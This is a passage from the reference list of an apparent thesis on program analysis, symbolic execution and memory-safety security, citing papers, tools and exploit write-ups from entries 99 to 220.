[99] Gerard J Holzmann. “The model checker SPIN”. In: IEEE Transactions on software engineering 23.5 (1997), p. 279. [100] R. Nigel Horspool and Nenad Marovac. “An Approach to the Problem of Detranslation of Computer Programs”. In: Comput. J. 23.3 (1980), pp. 223–229. [101] S. Horwitz, T. Reps, and D. Binkley. “Interprocedural Slicing Using Dependence Graphs”. In: Proceedings of the ACM SIGPLAN 1988 Conference on Programming Language Design and Implementation. PLDI ’88. Atlanta, Georgia, USA, 1988. [102] Susan Horwitz. “Precise Flow-Insensitive May-Alias Analysis is NP-Hard”. In: ACM Trans. Program. Lang. Syst. (1997). [103] Susan Horwitz, Thomas Reps, and Mooly Sagiv. Demand interprocedural dataflow analysis. Vol. 20. 4. ACM, 1995. [104] M. Hosken et al. Graphite Description Language. 2011. [105] Hong Hu et al. “Automatic Generation of Data-Oriented Exploits.” In: USENIX Security Symposium. 2015, pp. 177–192. [106] Free Software Foundation Inc. Using the GNU Compiler Collection (GCC). Accessed 2017-10-31. url: https://gcc.gnu.org/onlinedocs/gcc/Attribute-Syntax.html. [107] ISO/IEC. 9899 - Programming languages - C. Accessed 2018-02-19. url: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1124.pdf. [108] Daniel Jackson and Eugene J. Rollins. Chopping: A Generalization of Slicing. Tech. rep. In Proc. of the Second ACM SIGSOFT Symposium on the Foundations of Software Engineering, 1994. [109] Ke Jiang and Bengt Jonsson. “Using spin to model check concurrent algorithms, using a translation from c to promela”. In: MCC 2009. Department of Information Technology, Uppsala University. 2009, pp. 67–69. [110] Wesley Jin et al. “Recovering C++ Objects From Binaries Using Inter-Procedural Data-Flow Analysis”. In: Proceedings of ACM SIGPLAN on Program Protection and Reverse Engineering Workshop 2014. 2014. [111] Herbert Jordan, Bernhard Scholz, and Pavle Subotic. “Soufflé: On Synthesis of Program Analyzers”. 
In: Computer Aided Verification - 28th International Conference, CAV 2016, Toronto, ON, Canada, July 17-23, 2016, Proceedings, Part II. 2016. [112] Michael Kay. XSL Transformations (XSLT) Version 3.0. 2017. [113] John Kessenich, Dave Baldwin, and Randi Rost. The OpenGL Shading Language. 2014. [114] Sarfraz Khurshid, Corina S Păsăreanu, and Willem Visser. “Generalized symbolic execution for model checking and testing”. In: Tools and Algorithms for the Construction and Analysis of Systems. Springer, 2003, pp. 553–568. [115] Johannes Kinder et al. “Proactive detection of computer worms using model checking”. In: IEEE Transactions on Dependable and Secure Computing 7.4 (2010), pp. 424–438. [116] James C. King. “Symbolic Execution and Program Testing”. In: Commun. ACM (1976). 146 References

[117] Ted Kremenek. Finding software bugs with the Clang Static Analyzer. https://llvm.org/devmtg/2008-08/Kremenek_StaticAnalyzer.pdf. 2008. [118] Daniel Krupp et al. Cross Translational Unit Analysis in Clang Static Analyzer: Prototype and measurements. Accessed 2018-01-09. url: http://cc.elte.hu/clang-ctu/eurollvm17/abstract.pdf. [119] Robert P Kurshan. “Automata-theoretic verification of coordinating processes”. In: 11th International Conference on Analysis and Optimization of Systems Discrete Event Systems. Springer. 1994, pp. 16–28. [120] William Landi. “Undecidability of Static Analysis”. In: ACM Lett. Program. Lang. Syst. 1.4 (1992), 323–337. [121] Chris Lattner. LLVM. Accessed 2017-10-09. url: http://www.aosabook.org/en/llvm.html. [122] Chris Lattner and Vikram Adve. “LLVM: A Compilation Framework for Lifelong Program Analysis & Transformation”. In: Proceedings of the 2004 International Symposium on Code Generation and Optimization (CGO’04). Palo Alto, California, 2004. [123] Byoungyoung Lee et al. “Preventing Use-after-free with Dangling Pointers Nullification.” In: NDSS. 2015. [124] Juneyoung Lee et al. “Taming Undefined Behavior in LLVM”. In: ACM SIGPLAN Conference on Programming Language Design and Implementation (PLDI). 2017. [125] Thomas Lengauer and Robert Endre Tarjan. “A Fast Algorithm for Finding Dominators in a Flowgraph”. In: (1979). [126] Wenchao Li, Sanjit A. Seshia, and Somesh Jha. “CrowdMine: Towards Crowdsourced Human-assisted Verification”. In: Annual Design Automation Conference (DAC). 2012. [127] Wilson Lian, Hovav Shacham, and Stefan Savage. “A Call to ARMs: Understanding the Costs and Benefits of JIT Spraying Mitigations”. In: Symposium on Network and Distributed System Security (NDSS). 2017. [128] Cullen Linn and Saumya Debray. “Obfuscation of Executable Code to Improve Resistance to Static Disassembly”. In: ACM Conference on Computer and Communications Security (CCS). 2003. [129] Zhenhua Liu. 
Advanced Exploit Techniques Attacking the IE Script Engine. https://blog.fortinet.com/2014/06/16/advanced-exploit-techniques- attacking-the-ie-script-engine. 2014. [130] Benjamin Livshits et al. “In Defense of Soundiness: A Manifesto”. In: Commun. ACM 58.2 (Jan. 2015). [131] LLVM. Language Reference Manual. Accessed 2017-10-09. url: http://llvm.org/docs/LangRef.html. [132] Bruno Cardoso Lopes and Rafael Auler. Getting Start with LLVM Core Libraries. Packt Publishing, 2014. [133] Panagiotis Louridas. “Static Code Analysis”. In: IEEE Software 23.4 (2006), pp. 58–61. url: https://doi.org/10.1109/MS.2006.114. References 147

[134] Kangjie Lu et al. “UniSan: Proactive Kernel Memory Initialization to Eliminate Data Leakages”. In: ACM Conference on Computer and Communications Security (CCS). 2016. [135] Kangjie Lu et al. “Unleashing Use-Before-Initialization Vulnerabilities in the Linux Kernel Using Targeted Stack Spraying”. In: Symposium on Network and Distributed System Security (NDSS). 2017. [136] Kangjie Lu et al. “Unleashing Use-Before-Initialization Vulnerabilities in the Linux Kernel Using Targeted Stack Spraying”. In: Symposium on Network and Distributed System Security (NDSS). 2017. [137] Aravind Machiry et al. “DR. CHECKER: A Soundy Analysis for Linux Kernel Drivers”. In: USENIX Security Symposium. 2017. [138] Giorgi Maisuradze, Michael Backes, and Christian Rossow. “Dachshund: Digging for and Securing (Non-)Blinded Constants in JIT Code”. In: Symposium on Network and Distributed System Security (NDSS). 2017. [139] Kenneth L McMillan. Symbolic model checking. Springer, 1993. [140] Kenneth L McMillan. “Applications of Craig interpolants in model checking”. In: Tools and Algorithms for the Construction and Analysis of Systems. Springer, 2005, pp. 1–12. [141] Florian Merz, Stephan Falke, and Carsten Sinz. “LLBMC: Bounded model checking of C and C++ programs using a compiler IR”. In: Verified Software: Theories, Tools, Experiments. Springer, 2012, pp. 146–161. [142] Metasploit. ExpLib2 Testcase. https://goo.gl/YwodS5. 2017. [143] Microsoft. What is the Windows Integrity Mechanism? http://msdn.microsoft.com/en-us/library/bb625957.aspx. 2014. [144] Alyssa Milburn, Herbert Bos, and Christiano Giuffrida. “SafeInit: Comprehensive and Practical Mitigation of Uninitialized Read Vulnerabilities”. In: Symposium on Network and Distributed System Security (NDSS). 2017. [145] Alyssa Milburn, Herbert Bos, and Cristiano Giuffrida. “SafeInit: Comprehensive and Practical Mitigation of Uninitialized Read Vulnerabilities”. In: Symposium on Network and Distributed System Security (NDSS). 2017. 
[146] David Molnar, Xue Cong Li, and David A. Wagner. “Dynamic Test Generation to Find Integer Bugs in x86 Binary Linux Programs”. In: USENIX Security Symposium. 2009. [147] David Alexander Molnar et al. Catchconv: Symbolic execution and run-time type inference for integer conversion errors. Tech. rep. UC Berkeley EECS, 2007. [148] Oege de Moor et al. “.QL: Object-Oriented Queries Made Easy”. In: Generative and Transformational Techniques in Software Engineering II: International Summer School, GTTSE 2007, Braga, Portugal, July 2-7, 2007. Revised Papers. 2008. [149] Andreas Moser, Christopher Kruegel, and Engin Kirda. “Limits of Static Analysis for Malware Detection.” In: Annual Computer Security Applications Conference (ACSAC). 2007. 148 References

[150] Madanlal Musuvathi et al. “CMC: A pragmatic approach to model checking real code”. In: ACM SIGOPS Operating Systems Review 36.SI (2002), pp. 75–88. [151] Nicholas Nethercote and Julian Seward. “Valgrind: A program supervision framework”. In: In Third Workshop on Runtime Verification (RV’03. 2003. [152] Nicholas Nethercote and Julian Seward. “Valgrind: A Framework for Heavyweight Dynamic Binary Instrumentation”. In: Proceedings of the 28th ACM SIGPLAN Conference on Programming Language Design and Implementation. PLDI ’07. 2007. [153] James Newsome and Dawn Song. “Dynamic Taint Analysis for Automatic Detection, Analysis, and Signature Generation of Exploits on Commodity Software”. In: Symposium on Network and Distributed System Security (NDSS). 2005. [154] OpenHub. Mozilla Firefox Language Summary. https://goo.gl/Ka32Pp. November 2017. [155] Karl J Ottenstein and Linda M Ottenstein. “The program dependence graph in a software development environment”. In: ACM Sigplan Notices (1984). [156] David J Pearce, Paul HJ Kelly, and Chris Hankin. “Efficient field-sensitive pointer analysis of C”. In: ACM Transactions on Programming Languages and Systems (TOPLAS) 30.1 (2007), 4–es. [157] Alexandre Pelletier. Advanced Exploitation of Internet Explorer Heap Overflow (Pwn2Own 2012 Exploit). http://web.archive.org/web/20141005134545/http: //www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_ Explorer_HeapOv_CVE-2012-1876.php. 2012. [158] Jannik Pewny et al. “Cross-Architecture Bug Search in Binary Executables”. In: IEEE Symposium on Security and Privacy. IEEE. 2015. [159] Sebastian Poeplau and Aurélien Francillon. “Systematic comparison of symbolic execution systems: intermediate representation and its generation”. In: Proceedings of the 35th Annual Computer Security Applications Conference. 2019, pp. 163–176. [160] Sebastian Poeplau and Aurélien Francillon. 
“Symbolic execution with SymCC: Don’t interpret, compile!” In: 29th USENIX Security Symposium (USENIX Security 20). USENIX Association, 2020. [161] Jean-Pierre Queille and Joseph Sifakis. “Specification and verification of concurrent systems in CESAR”. In: International Symposium on Programming. Springer. 1982, pp. 337–351. [162] G. Ramalingam. “The Undecidability of Aliasing”. In: ACM Trans. Program. Lang. Syst. 16.5 (Sept. 1994). [163] David A. Ramos and Dawson Engler. “Under-constrained Symbolic Execution: Correctness Checking for Real Code”. In: USENIX Security Symposium. 2015. [164] Francesco Ranzato. “Complete abstractions everywhere”. In: International Workshop on Verification, Model Checking, and Abstract Interpretation. Springer. 2013. References 149

[165] Rapid7. Metasploit Browser Exploitation Library. https://github.com/rapid7/metasploit-framework/blob/4.15.0/lib/msf/core/exploit/http/server/html.rb. 2015.
[166] Charles Reis and Steven D. Gribble. “Isolating Web Programs in Modern Browser Architectures”. In: Proceedings of the 4th ACM European Conference on Computer Systems. 2009.
[167] Thomas Reps. “Undecidability of Context-sensitive Data-dependence Analysis”. In: ACM Trans. Program. Lang. Syst. 22.1 (Jan. 2000).
[168] Thomas Reps, Susan Horwitz, and Mooly Sagiv. “Precise Interprocedural Dataflow Analysis via Graph Reachability”. In: Proceedings of the 22nd ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages. 1995.
[169] Thomas Reps, Stefan Schwoon, and Somesh Jha. “Weighted pushdown systems and their application to interprocedural dataflow analysis”. In: Static Analysis. Springer, 2003, pp. 189–213.
[170] John C. Reynolds. “Separation logic: A logic for shared mutable data structures”. In: Proceedings of the 17th Annual IEEE Symposium on Logic in Computer Science. IEEE. 2002, pp. 55–74.
[171] S. Richardson and M. Ganapathi. Interprocedural Analysis Useless for Code Optimization. Tech. rep. Stanford, CA, USA, 1987.
[172] Noam Rinetzky and Mooly Sagiv. “Interprocedural shape analysis for recursive programs”. In: Compiler Construction. Springer. 2001, pp. 133–149.
[173] Roman Rogowski et al. “Revisiting browser security in the modern era: New data-only attacks and defenses”. In: IEEE EuroS&P (2017).
[174] Florent Saudel and Jonathan Salwan. “Triton: A Dynamic Symbolic Execution Framework”. In: Symposium sur la sécurité des technologies de l’information et des communications, SSTIC, France, Rennes, June 3-5 2015. SSTIC, 2015, pp. 31–54.
[175] Sergej Schumilo et al. “kAFL: Hardware-Assisted Feedback Fuzzing for OS Kernels”. In: USENIX Security Symposium. 2017.
[176] E. J. Schwartz, T. Avgerinos, and D. Brumley. “All You Ever Wanted to Know about Dynamic Taint Analysis and Forward Symbolic Execution (but Might Have Been Afraid to Ask)”. In: 2010 IEEE Symposium on Security and Privacy. 2010.
[177] Edward J. Schwartz, Thanassis Avgerinos, and David Brumley. “All You Ever Wanted to Know About Dynamic Taint Analysis and Forward Symbolic Execution (but Might Have Been Afraid to Ask)”. In: IEEE Symposium on Security and Privacy. 2010.
[178] Robert C. Seacord. The CERT® C Coding Standard, Second Edition: 98 Rules for Developing Safe, Reliable, and Secure Systems. 2nd. Addison-Wesley Professional, 2014.
[179] Koushik Sen, Darko Marinov, and Gul Agha. “CUTE: A Concolic Unit Testing Engine for C”. In: Proceedings of the 10th European Software Engineering Conference Held Jointly with 13th ACM SIGSOFT International Symposium on Foundations of Software Engineering. 2005.
[180] M. Sharir and A. Pnueli. Two approaches to interprocedural data flow analysis. New York, NY: New York Univ. Comput. Sci. Dept., 1978.
[181] Yan Shoshitaishvili et al. “Firmalice - Automatic Detection of Authentication Bypass Vulnerabilities in Binary Firmware”. In: Symposium on Network and Distributed System Security (NDSS). 2015.
[182] Yan Shoshitaishvili et al. “SoK: (State of) The Art of War: Offensive Techniques in Binary Analysis”. In: IEEE Symposium on Security and Privacy. 2016.
[183] Yan Shoshitaishvili et al. “Rise of the HaCRS: Augmenting Autonomous Cyber Reasoning Systems with Human Assistance”. In: ACM Conference on Computer and Communications Security (CCS). 2017.
[184] Josep Silva. “A vocabulary of program slicing-based techniques”. In: ACM Computing Surveys (CSUR) (2012).
[185] Asia Slowinska, Traian Stancescu, and Herbert Bos. “Howard: a dynamic excavator for reverse engineering data structures”. In: Symposium on Network and Distributed System Security (NDSS). San Diego, CA, 2011.
[186] Yannis Smaragdakis and George Balatsouras. “Pointer Analysis”. In: Found. Trends Program. Lang. 2.1 (Apr. 2015).
[187] Yannis Smaragdakis and Martin Bravenboer. “Using Datalog for Fast and Easy Program Analysis”. In: Proceedings of the First International Conference on Datalog Reloaded. 2011.
[188] Dawn Song et al. “BitBlaze: A new approach to computer security via binary analysis”. In: Information Systems Security. Springer, 2008, pp. 1–25.
[189] Alexander Sotirov. “Bypassing memory protections: The future of exploitation”. In: USENIX Security Symposium. 2009.
[190] E. Stepanov and K. Serebryany. “MemorySanitizer: Fast detector of uninitialized memory use in C++”. In: 2015 IEEE/ACM International Symposium on Code Generation and Optimization (CGO). 2015.
[191] Nick Stephens et al. “Driller: Augmenting Fuzzing Through Selective Symbolic Execution”. In: Symposium on Network and Distributed System Security (NDSS). 2016.
[192] Bing Sun, Chong Xu, and Stanley Zhu. The Power of Data-Oriented Attacks: Bypassing Memory Mitigation Using Data-Only Exploitation Technique. 2017.
[193] Laszlo Szekeres et al. “SoK: Eternal War in Memory”. In: IEEE Symposium on Security and Privacy. 2013.
[194] László Szekeres et al. “SoK: Eternal War in Memory”. In: IEEE Symposium on Security and Privacy. 2013.
[195] Mozilla Security Team. CVE-2016-9079: Use-after-free in SVG Animation. https://bugzilla.mozilla.org/show_bug.cgi?id=1321066.
[196] Theori-io. Pwn.js. http://theori.io/pwnjs/. 2017.
[197] Caroline Tice et al. “Enforcing Forward-Edge Control-Flow Integrity in GCC & LLVM”. In: USENIX Security Symposium. 2014.
[198] Axel Tillequin. Amoco. https://github.com/bdcht/amoco. 2016.
[199] David Trabish et al. “Chopped Symbolic Execution”. In: International Conference on Software Engineering (ICSE 2018). 2018.
[200] TrailOfBits. DARPA Challenge Binaries on Linux, OS X, and Windows. Accessed 2018-01-22. url: https://github.com/trailofbits/cb-multios.
[201] travitch. A Concurrent WLLVM in Go. Accessed 2019-01-15. url: https://github.com/SRI-CSL/gllvm.
[202] travitch. Whole Program LLVM. Accessed 2018-01-15. url: https://github.com/travitch/whole-program-llvm.
[203] Chris Valasek. HeapLib2.0. http://blog.ioactive.com/2013/11/heaplib-20.html. 2013.
[204] Michael James Van Emmerik. “Static single assignment for decompilation”. PhD thesis. The University of Queensland, 2007.
[205] Victor van der Veen et al. “The Dynamics of Innocent Flesh on the Bone: Code Reuse Ten Years Later”. In: ACM Conference on Computer and Communications Security (CCS). 2017.
[206] VMware. Differential Datalog (DDlog). https://github.com/vmware/differential-datalog. 2020.
[207] Sebastian Vogl et al. “Dynamic Hooks: Hiding Control Flow Changes within Non-Control Data”. In: USENIX Security Symposium. 2014.
[208] Junjie Wang et al. “Skyfire: Data-driven seed generation for fuzzing”. In: IEEE Symposium on Security and Privacy. 2017.
[209] Tielei Wang et al. “IntScope: Automatically Detecting Integer Overflow Vulnerability in X86 Binary Using Symbolic Execution”. In: Symposium on Network and Distributed System Security (NDSS). 2009.
[210] Xi Wang et al. “Undefined Behavior: What Happened to My Code?” In: Proceedings of the Asia-Pacific Workshop on Systems. 2012.
[211] Mark Weiser. “Program slicing”. In: IEEE Transactions on Software Engineering (1984).
[212] John Whaley et al. “Using Datalog with Binary Decision Diagrams for Program Analysis”. In: Proceedings of the Third Asian Conference on Programming Languages and Systems. APLAS’05. 2005.
[213] Fabian Yamaguchi et al. “Modeling and Discovering Vulnerabilities with Code Property Graphs”. In: Proceedings of the 2014 IEEE Symposium on Security and Privacy. IEEE Computer Society, 2014.
[214] Xuejun Yang et al. “Finding and Understanding Bugs in C Compilers”. In: Proceedings of the 32nd ACM SIGPLAN Conference on Programming Language Design and Implementation. 2011.
[215] Ding Ye, Yulei Sui, and Jingling Xue. “Accelerating Dynamic Detection of Uses of Undefined Values with Static Value-Flow Analysis”. In: Proceedings of the Annual IEEE/ACM International Symposium on Code Generation and Optimization. 2014.
[216] Insu Yun et al. “QSYM: A practical concolic execution engine tailored for hybrid fuzzing”. In: USENIX Security Symposium. 2018.
[217] ZDI. CVE-2011-1346, (Pwn2Own) Microsoft Internet Explorer Uninitialized Variable Information Leak Vulnerability. http://www.zerodayinitiative.com/advisories/ZDI-11-198/.
[218] Chao Zhang et al. “Practical Control-Flow Integrity and Randomization for Binary Executables”. In: IEEE Symposium on Security and Privacy. 2013.
[219] Jian Zhang and Xiaoxu Wang. “A constraint solver and its application to path feasibility analysis”. In: International Journal of Software Engineering and Knowledge Engineering 11.02 (2001), pp. 139–156.
[220] Mingwei Zhang and R. Sekar. “Control-Flow Integrity for COTS Binaries”. In: USENIX Security Symposium. 2013.